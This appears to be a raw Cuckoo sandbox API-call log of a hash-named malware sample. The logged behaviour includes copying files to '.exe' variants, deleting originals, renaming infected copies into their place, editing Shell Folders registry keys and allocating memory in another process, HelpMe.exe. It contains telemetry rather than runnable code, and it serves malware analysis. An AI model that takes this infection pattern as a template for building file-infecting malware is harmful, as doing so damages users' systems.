"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001e0","nNumberOfBytesToWrite->61440"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToRead->61440"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001e0","nNumberOfBytesToWrite->61440"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToRead->61440"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001e0","nNumberOfBytesToWrite->61440"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToRead->61440"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001e0","nNumberOfBytesToWrite->61440"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToRead->61440"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001e0","nNumberOfBytesToWrite->61440"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToRead->61440"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001e0","nNumberOfBytesToWrite->61440"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToRead->61440"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001e0","nNumberOfBytesToWrite->61440"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToRead->9614"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001e0","nNumberOfBytesToWrite->9614"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001dc","nNumberOfBytesToRead->71"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001e0","nNumberOfBytesToWrite->71"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001e0","nNumberOfBytesToWrite->268"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001e0","nNumberOfBytesToWrite->268"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","registry","RegCreateKeyExW","SUCCESS","0x000001e0","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","registry","RegQueryValueExW","SUCCESS","","hKey->0x000001e0","lpValueName->AppData"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","registry","RegCreateKeyExW","SUCCESS","0x000001e0","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","registry","RegSetValueExW","SUCCESS","","hKey->0x000001e0","lpValueName->AppData","dwType->1","lpData->C:\Documents and Settings\janettedoe\Application Data","cbData->108"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","registry","RegOpenKeyExW","SUCCESS","0x000001e0","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","registry","RegOpenKeyExW","SUCCESS","0x000001dc","hKey->0x000001e0","lpSubKey->{a20cd692-8e41-11e1-9999-806d6172696f}\"
"20190910071259.123","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","registry","RegQueryValueExW","SUCCESS","","hKey->0x000001dc","lpValueName->Generation"
"20190910071259.133","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","registry","RegOpenKeyExW","SUCCESS","0x000001dc","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume"
"20190910071259.133","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","registry","RegOpenKeyExW","SUCCESS","0x000001e0","hKey->0x000001dc","lpSubKey->{a20cd692-8e41-11e1-9999-806d6172696f}\"
"20190910071259.133","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","registry","RegQueryValueExW","SUCCESS","","hKey->0x000001e0","lpValueName->Generation"
"20190910071259.133","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","registry","RegOpenKeyExW","SUCCESS","0x000001e0","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume"
"20190910071259.133","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","registry","RegOpenKeyExW","SUCCESS","0x000001dc","hKey->0x000001e0","lpSubKey->{a20cd692-8e41-11e1-9999-806d6172696f}\"
"20190910071259.133","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","registry","RegQueryValueExW","SUCCESS","","hKey->0x000001dc","lpValueName->Generation"
"20190910071259.133","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","DeleteFileW","SUCCESS","","lpFileName->C:\cuckoo\files\.gitignore"
"20190910071259.133","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","MoveFileWithProgressW","SUCCESS","","lpExistingFileName->C:\cuckoo\files\.gitignore.exe","lpNewFileName->C:\cuckoo\files\.gitignore"
"20190910071259.133","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","CreateFileW","SUCCESS","0x000001dc","lpFileName->C:\cuckoo\logs\.gitignore","dwDesiredAccess->GENERIC_READ"
"20190910071259.133","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001dc","nNumberOfBytesToRead->268"
"20190910071259.133","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","CreateFileW","SUCCESS","0x000001dc","lpFileName->C:\b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","dwDesiredAccess->GENERIC_READ"
"20190910071259.133","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","CreateFileW","SUCCESS","0x000001e0","lpFileName->C:\cuckoo\logs\.gitignore","dwDesiredAccess->GENERIC_READ"
"20190910071259.133","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","CreateFileW","SUCCESS","0x000001bc","lpFileName->C:\cuckoo\logs\.gitignore.exe","dwDesiredAccess->GENERIC_READ | GENERIC_WRITE"
"20190910071259.133","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","registry","RegOpenKeyExW","SUCCESS","0x000001f0","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume"
"20190910071259.133","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","registry","RegOpenKeyExW","SUCCESS","0x000001fc","hKey->0x000001f0","lpSubKey->{a20cd692-8e41-11e1-9999-806d6172696f}\"
"20190910071259.133","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","registry","RegQueryValueExW","SUCCESS","","hKey->0x000001fc","lpValueName->Generation"
"20190910071259.133","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","registry","RegCreateKeyExW","SUCCESS","0x000001fc","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders"
"20190910071259.133","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","registry","RegQueryValueExW","SUCCESS","","hKey->0x000001fc","lpValueName->My Pictures"
"20190910071259.133","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","registry","RegCreateKeyExW","SUCCESS","0x000001fc","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders"
"20190910071259.133","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","registry","RegSetValueExW","SUCCESS","","hKey->0x000001fc","lpValueName->My Pictures","dwType->1","lpData->C:\Documents and Settings\janettedoe\My Documents\My Pictures","cbData->124"
"20190910071259.133","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","registry","RegOpenKeyExW","SUCCESS","0x000001fc","hKey->HKEY_CURRENT_USER","lpSubKey->Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\CPC\Volume"
"20190910071259.133","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","registry","RegOpenKeyExW","SUCCESS","0x000001f0","hKey->0x000001fc","lpSubKey->{a20cd692-8e41-11e1-9999-806d6172696f}\"
"20190910071259.133","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","registry","RegQueryValueExW","SUCCESS","","hKey->0x000001f0","lpValueName->Generation"
"20190910071259.133","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","memory","VirtualAllocEx","SUCCESS","0x00154000","th32ProcessID->420","szExeFile->b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","lpAddress->0x00154000","dwSize->65536","flAllocationType->0x00001000","flProtect->0x00000004"
"20190910071259.133","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001dc","nNumberOfBytesToRead->61440"
"20190910071259.133","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToWrite->61440"
"20190910071259.133","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001dc","nNumberOfBytesToRead->61440"
"20190910071259.133","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToWrite->61440"
"20190910071259.133","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001dc","nNumberOfBytesToRead->61440"
"20190910071259.133","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToWrite->61440"
"20190910071259.133","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001dc","nNumberOfBytesToRead->61440"
"20190910071259.133","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToWrite->61440"
"20190910071259.133","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001dc","nNumberOfBytesToRead->61440"
"20190910071259.133","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToWrite->61440"
"20190910071259.133","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001dc","nNumberOfBytesToRead->61440"
"20190910071259.133","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToWrite->61440"
"20190910071259.133","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001dc","nNumberOfBytesToRead->61440"
"20190910071259.133","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToWrite->61440"
"20190910071259.133","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001dc","nNumberOfBytesToRead->61440"
"20190910071259.133","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToWrite->61440"
"20190910071259.133","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001dc","nNumberOfBytesToRead->61440"
"20190910071259.133","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToWrite->61440"
"20190910071259.133","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001dc","nNumberOfBytesToRead->61440"
"20190910071259.133","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToWrite->61440"
"20190910071259.133","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001dc","nNumberOfBytesToRead->61440"
"20190910071259.133","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToWrite->61440"
"20190910071259.133","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001dc","nNumberOfBytesToRead->61440"
"20190910071259.133","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToWrite->61440"
"20190910071259.133","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001dc","nNumberOfBytesToRead->61440"
"20190910071259.144","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToWrite->61440"
"20190910071259.144","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001dc","nNumberOfBytesToRead->61440"
"20190910071259.144","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToWrite->61440"
"20190910071259.144","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001dc","nNumberOfBytesToRead->61440"
"20190910071259.144","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToWrite->61440"
"20190910071259.144","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001dc","nNumberOfBytesToRead->61440"
"20190910071259.144","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToWrite->61440"
"20190910071259.144","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001dc","nNumberOfBytesToRead->61440"
"20190910071259.144","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToWrite->61440"
"20190910071259.144","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001dc","nNumberOfBytesToRead->61440"
"20190910071259.144","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToWrite->61440"
"20190910071259.144","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001dc","nNumberOfBytesToRead->61440"
"20190910071259.144","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToWrite->61440"
"20190910071259.144","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001dc","nNumberOfBytesToRead->61440"
"20190910071259.144","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToWrite->61440"
"20190910071259.144","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001dc","nNumberOfBytesToRead->61440"
"20190910071259.144","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToWrite->61440"
"20190910071259.144","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001dc","nNumberOfBytesToRead->9614"
"20190910071259.144","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToWrite->9614"
"20190910071259.144","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001e0","nNumberOfBytesToRead->71"
"20190910071259.144","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToWrite->71"
"20190910071259.144","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToWrite->268"
"20190910071259.144","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToWrite->268"
"20190910071259.144","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","DeleteFileW","SUCCESS","","lpFileName->C:\cuckoo\logs\.gitignore"
"20190910071259.144","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","MoveFileWithProgressW","SUCCESS","","lpExistingFileName->C:\cuckoo\logs\.gitignore.exe","lpNewFileName->C:\cuckoo\logs\.gitignore"
"20190910071259.144","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","CreateFileW","SUCCESS","0x000001bc","lpFileName->C:\cuckoo\logs\420.csv","dwDesiredAccess->GENERIC_READ"
"20190910071259.144","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToRead->268"
"20190910071259.144","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","CreateFileW","SUCCESS","0x000001bc","lpFileName->C:\b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","dwDesiredAccess->GENERIC_READ"
"20190910071259.144","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","CreateFileW","SUCCESS","0x000001e0","lpFileName->C:\cuckoo\logs\420.csv","dwDesiredAccess->GENERIC_READ"
"20190910071259.144","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","CreateFileW","SUCCESS","0x000001dc","lpFileName->C:\cuckoo\logs\420.csv.exe","dwDesiredAccess->GENERIC_READ | GENERIC_WRITE"
"20190910071259.144","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","memory","VirtualAllocEx","SUCCESS","0x00154000","th32ProcessID->612","szExeFile->HelpMe.exe","lpAddress->0x00154000","dwSize->65536","flAllocationType->0x00001000","flProtect->0x00000004"
"20190910071259.144","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToRead->61440"
"20190910071259.144","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001dc","nNumberOfBytesToWrite->61440"
"20190910071259.144","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToRead->61440"
"20190910071259.144","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001dc","nNumberOfBytesToWrite->61440"
"20190910071259.144","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToRead->61440"
"20190910071259.144","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001dc","nNumberOfBytesToWrite->61440"
"20190910071259.144","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToRead->61440"
"20190910071259.144","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001dc","nNumberOfBytesToWrite->61440"
"20190910071259.144","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToRead->61440"
"20190910071259.144","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001dc","nNumberOfBytesToWrite->61440"
"20190910071259.144","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToRead->61440"
"20190910071259.144","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001dc","nNumberOfBytesToWrite->61440"
"20190910071259.144","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToRead->61440"
"20190910071259.144","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001dc","nNumberOfBytesToWrite->61440"
"20190910071259.144","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToRead->61440"
"20190910071259.144","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001dc","nNumberOfBytesToWrite->61440"
"20190910071259.144","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToRead->61440"
"20190910071259.144","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001dc","nNumberOfBytesToWrite->61440"
"20190910071259.144","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToRead->61440"
"20190910071259.144","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001dc","nNumberOfBytesToWrite->61440"
"20190910071259.144","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToRead->61440"
"20190910071259.144","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001dc","nNumberOfBytesToWrite->61440"
"20190910071259.144","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToRead->61440"
"20190910071259.144","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001dc","nNumberOfBytesToWrite->61440"
"20190910071259.144","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToRead->61440"
"20190910071259.144","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","WriteFile","SUCCESS","","hFile->0x000001dc","nNumberOfBytesToWrite->61440"
"20190910071259.144","420","b467ddb09b344c57ef039e29b9173d2c43fa4299a3e19b4941bbaf36d97178ca","600","filesystem","ReadFile","SUCCESS","","hFile->0x000001bc","nNumberOfBytesToRead->61440"
